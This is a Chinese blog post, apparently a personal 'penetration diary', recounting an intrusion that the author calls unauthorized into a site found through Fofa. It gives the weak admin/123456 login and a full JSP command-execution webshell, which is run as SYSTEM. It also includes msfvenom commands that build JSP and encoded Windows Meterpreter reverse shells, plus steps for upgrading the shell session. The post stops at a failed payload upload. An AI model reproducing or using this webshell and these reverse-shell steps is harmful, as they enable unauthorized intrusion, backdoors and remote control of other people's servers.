菜鸡的渗透日记 _渗透

作者：R3gr3t合天智汇
Fofa上找了个站，未授权，所以下文图片打码
漏洞url为：http://ip:port/
1. 弱口令登录由于一个后台弱口令，才有了下面的渗透过程.

文章插图

试了个弱口令， admin ， 123456进去了
2. 寻找上传点最近对文件上传漏洞很敏感，因为文件上传比较方便，可以直接传弹shell
翻了翻，在后台菜单发现了一个“附件管理”的功能

文章插图

选择添加附件

文章插图

然后抓包，由于环境是JAVA+Tomcat+iis ，看看能不能上传一个jsp
我首先是上传了一个执行命令并回显的

<%if ("023".equals(request.getParameter("pwd"))) {java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b)) != -1) {out.println(new String(b));}out.print("</pre>");}%>

发包

文章插图

小路径：
http://ip:port/static/tmp/aca388dd-ddf3-48e0-b96a-642a4086e951.jsp?pwd=023&i=whoami
执行whoami命令，当前用户是个nt authoritysystem权限，好事，省的一会还得提权
这下知道了对面是个win ，执行dir看一下目录

文章插图

报错了，经测试，无法查看目录，但是可以执行systeminfo
系统是 windows Server 2008 R2 Enterprise ，打了208个补丁（还好不用提权）
3. 传马然后我打算搞一个msf的上去
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
jsp感觉是真的麻烦，只能会连一个cmd ，不能回连meterpreter ，所以几乎浪费了一晚上的时候 ):

文章插图

然后msf配置好，接shell

文章插图

4. 尝试cmd->meterpreter【菜鸡的渗透日记】cmd对接下来的渗透不方便，想改为meterpreter
问了队里的师傅，说search upgrade一下，有把cmd转换为meterpreter的模块

文章插图

应该是那个
post/multi/manage/shell_to_meterpreter模块没错了
坑点1问题来了，要想使用其他模块就需要把这个session放到后台去，平常meterpreter的操作都是background ，这个cmd我当时就懵了
无意中发现在cmd里也可以使用meterpreter的部分命令，不得不说msf真是强大

文章插图

background放到后台， use
post/multi/manage/shell_to_meterpreter ， set SESSION ，然后run
不知道为什么，它就失败了

文章插图

坑点2下一种方法，搞一个
windows/meterpreter/reverse_tcp的上去，拿msf生成了个
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -i 10 -f exe > shell.exe
由于cmd可以使用msf的upload命令，直接执行upload shell.exe shell.exe上去
再一次挺突然的，失败了